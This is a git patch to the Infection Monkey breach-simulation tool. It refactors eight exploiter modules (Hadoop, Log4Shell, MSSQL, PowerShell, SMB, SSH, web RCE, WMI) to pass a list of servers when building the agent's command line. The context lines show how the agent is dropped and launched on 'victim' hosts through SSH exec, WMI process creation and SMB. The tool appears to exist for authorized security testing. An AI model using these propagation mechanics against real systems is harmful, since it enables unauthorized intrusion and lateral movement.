From 42de7140f302453596f4b062302b98c5c82d1c9b Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski <ilija.la@live.com>
Date: Fri, 2 Sep 2022 16:13:00 +0200
Subject: [PATCH] Agent: Modify exploiters to use list of servers

---
 monkey/infection_monkey/exploit/hadoop.py     | 2 +-
 monkey/infection_monkey/exploit/log4shell.py  | 2 +-
 monkey/infection_monkey/exploit/mssqlexec.py  | 2 +-
 monkey/infection_monkey/exploit/powershell.py | 8 ++++----
 monkey/infection_monkey/exploit/smbexec.py    | 4 ++--
 monkey/infection_monkey/exploit/sshexec.py    | 2 +-
 monkey/infection_monkey/exploit/web_rce.py    | 6 ++++--
 monkey/infection_monkey/exploit/wmiexec.py    | 4 ++--
 8 files changed, 16 insertions(+), 14 deletions(-)

diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py
index 2c0ceaa73..1b7c54470 100644
--- a/monkey/infection_monkey/exploit/hadoop.py
+++ b/monkey/infection_monkey/exploit/hadoop.py
@@ -104,7 +104,7 @@ class HadoopExploiter(WebRCE):
 
     def _build_command(self, path, http_path):
         # Build command to execute
-        monkey_cmd = build_monkey_commandline(self.host, self.current_depth + 1)
+        monkey_cmd = build_monkey_commandline(self.servers, self.current_depth + 1)
         if self.host.is_windows():
             base_command = HADOOP_WINDOWS_COMMAND
         else:
diff --git a/monkey/infection_monkey/exploit/log4shell.py b/monkey/infection_monkey/exploit/log4shell.py
index fc925091b..399a2706e 100644
--- a/monkey/infection_monkey/exploit/log4shell.py
+++ b/monkey/infection_monkey/exploit/log4shell.py
@@ -115,7 +115,7 @@ class Log4ShellExploiter(WebRCE):
 
     def _build_command(self, path: PurePath, http_path) -> str:
         # Build command to execute
-        monkey_cmd = build_monkey_commandline(self.host, self.current_depth + 1, location=path)
+        monkey_cmd = build_monkey_commandline(self.servers, self.current_depth + 1, location=path)
         if self.host.is_windows():
             base_command = LOG4SHELL_WINDOWS_COMMAND
         else:
diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py
index b037c782a..6fd8e27cb 100644
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@@ -179,7 +179,7 @@ class MSSQLExploiter(HostExploiter):
 
     def _build_agent_launch_command(self, agent_path_on_victim: PureWindowsPath) -> str:
         agent_args = build_monkey_commandline(
-            self.host, self.current_depth + 1, agent_path_on_victim
+            self.servers, self.current_depth + 1, agent_path_on_victim
         )
 
         return f"{agent_path_on_victim} {DROPPER_ARG} {agent_args}"
diff --git a/monkey/infection_monkey/exploit/powershell.py b/monkey/infection_monkey/exploit/powershell.py
index d6b626f9f..ff0f0db4e 100644
--- a/monkey/infection_monkey/exploit/powershell.py
+++ b/monkey/infection_monkey/exploit/powershell.py
@@ -15,7 +15,7 @@ from infection_monkey.exploit.powershell_utils.powershell_client import (
     PowerShellClient,
 )
 from infection_monkey.exploit.tools.helpers import get_agent_dst_path, get_random_file_suffix
-from infection_monkey.model import DROPPER_ARG, RUN_MONKEY, VictimHost
+from infection_monkey.model import DROPPER_ARG, RUN_MONKEY
 from infection_monkey.utils.commands import build_monkey_commandline
 from infection_monkey.utils.environment import is_windows_os
 from infection_monkey.utils.threading import interruptible_iter
@@ -169,7 +169,7 @@ class PowerShellExploiter(HostExploiter):
 
     def _run_monkey_executable_on_victim(self, executable_path):
         monkey_execution_command = build_monkey_execution_command(
-            self.host, self.current_depth + 1, executable_path
+            self.servers, self.current_depth + 1, executable_path
         )
 
         logger.info(
@@ -179,9 +179,9 @@ class PowerShellExploiter(HostExploiter):
         self._client.execute_cmd_as_detached_process(monkey_execution_command)
 
 
-def build_monkey_execution_command(host: VictimHost, depth: int, executable_path: str) -> str:
+def build_monkey_execution_command(servers: List[str], depth: int, executable_path: str) -> str:
     monkey_params = build_monkey_commandline(
-        target_host=host,
+        servers,
         depth=depth,
         location=executable_path,
     )
diff --git a/monkey/infection_monkey/exploit/smbexec.py b/monkey/infection_monkey/exploit/smbexec.py
index 272f150eb..abf8b4f47 100644
--- a/monkey/infection_monkey/exploit/smbexec.py
+++ b/monkey/infection_monkey/exploit/smbexec.py
@@ -91,14 +91,14 @@ class SMBExploiter(HostExploiter):
             cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {
                 "dropper_path": remote_full_path
             } + build_monkey_commandline(
-                self.host,
+                self.servers,
                 self.current_depth + 1,
                 str(dest_path),
             )
         else:
             cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {
                 "monkey_path": remote_full_path
-            } + build_monkey_commandline(self.host, self.current_depth + 1)
+            } + build_monkey_commandline(self.servers, self.current_depth + 1)
 
         smb_conn = None
         for str_bind_format, port in SMBExploiter.KNOWN_PROTOCOLS.values():
diff --git a/monkey/infection_monkey/exploit/sshexec.py b/monkey/infection_monkey/exploit/sshexec.py
index 69b29c813..3ff128203 100644
--- a/monkey/infection_monkey/exploit/sshexec.py
+++ b/monkey/infection_monkey/exploit/sshexec.py
@@ -245,7 +245,7 @@ class SSHExploiter(HostExploiter):
 
         try:
             cmdline = f"{monkey_path_on_victim} {MONKEY_ARG}"
-            cmdline += build_monkey_commandline(self.host, self.current_depth + 1)
+            cmdline += build_monkey_commandline(self.servers, self.current_depth + 1)
             cmdline += " > /dev/null 2>&1 &"
             ssh.exec_command(cmdline, timeout=SSH_EXEC_TIMEOUT)
 
diff --git a/monkey/infection_monkey/exploit/web_rce.py b/monkey/infection_monkey/exploit/web_rce.py
index 4083aa928..f4cbd7948 100644
--- a/monkey/infection_monkey/exploit/web_rce.py
+++ b/monkey/infection_monkey/exploit/web_rce.py
@@ -370,14 +370,16 @@ class WebRCE(HostExploiter):
             default_path = self.get_default_dropper_path()
             if default_path is False:
                 return False
-            monkey_cmd = build_monkey_commandline(self.host, self.current_depth + 1, default_path)
+            monkey_cmd = build_monkey_commandline(
+                self.servers, self.current_depth + 1, default_path
+            )
             command = RUN_MONKEY % {
                 "monkey_path": path,
                 "monkey_type": DROPPER_ARG,
                 "parameters": monkey_cmd,
             }
         else:
-            monkey_cmd = build_monkey_commandline(self.host, self.current_depth + 1)
+            monkey_cmd = build_monkey_commandline(self.servers, self.current_depth + 1)
             command = RUN_MONKEY % {
                 "monkey_path": path,
                 "monkey_type": MONKEY_ARG,
diff --git a/monkey/infection_monkey/exploit/wmiexec.py b/monkey/infection_monkey/exploit/wmiexec.py
index 6c5b189f7..8cfd27a3d 100644
--- a/monkey/infection_monkey/exploit/wmiexec.py
+++ b/monkey/infection_monkey/exploit/wmiexec.py
@@ -103,14 +103,14 @@ class WmiExploiter(HostExploiter):
                 cmdline = DROPPER_CMDLINE_WINDOWS % {
                     "dropper_path": remote_full_path
                 } + build_monkey_commandline(
-                    self.host,
+                    self.servers,
                     self.current_depth + 1,
                     DROPPER_TARGET_PATH_WIN64,
                 )
             else:
                 cmdline = MONKEY_CMDLINE_WINDOWS % {
                     "monkey_path": remote_full_path
-                } + build_monkey_commandline(self.host, self.current_depth + 1)
+                } + build_monkey_commandline(self.servers, self.current_depth + 1)
 
             # execute the remote monkey
             result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(